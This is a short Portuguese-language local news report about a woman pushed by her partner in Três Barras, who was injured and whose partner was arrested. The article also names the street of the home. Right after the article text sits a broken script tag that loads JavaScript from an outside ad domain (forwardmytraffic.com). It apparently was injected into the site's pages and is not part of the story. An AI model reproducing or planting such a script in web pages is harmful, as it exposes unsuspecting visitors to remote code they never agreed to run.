InícioDestaqueMulher é Agredida por Companheiro em Três Barras

Mulher é Agredida por Companheiro em Três Barras

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Na sexta-feira, 07, por volta das 12h35, equipes da PM de Três Barras foram acionadas via COPOM para deslocar até o Pronto Atendimento Municipal de Três Barras.

 

No local foi conversado com a vitima a qual relatou que discutiu com seu companheiro, devido a um desentendimento entre seus filhos, ambos se exaltaram e durante a discussão o homem empurrou a vítima e ela caiu de costas e bateu a cabeça no piso, vindo a perder a consciência (desmaio), resultando em traumatismo craniano leve e um hematoma de 6 cm de diâmetro.

 

Na residência onde ocorreu o desentendimento, Rua João Manoel Sarda, Km 02, no município de Três Barras compareceu o pai da vítima o qual conduziu sua filha ao hospital para atendimento após seus netos que presenciaram a situação e ligaram para o avô pedindo ajuda. Diante dos fatos o homem foi preso em flagrante e conduzido para providencias…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.